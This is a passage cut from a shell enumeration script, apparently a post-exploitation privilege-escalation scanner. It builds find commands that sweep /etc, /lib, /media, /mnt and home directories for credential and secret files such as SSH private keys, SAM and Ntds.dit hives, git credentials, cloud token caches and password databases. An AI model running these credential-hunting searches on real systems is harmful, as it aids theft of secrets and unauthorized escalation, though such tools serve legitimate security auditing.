\"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"*knockd*\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"exports\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"ssh*config\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find ${ROOT_FOLDER}lib -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" -o -name \"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find ${ROOT_FOLDER}lib32 -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find ${ROOT_FOLDER}lib64 -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name 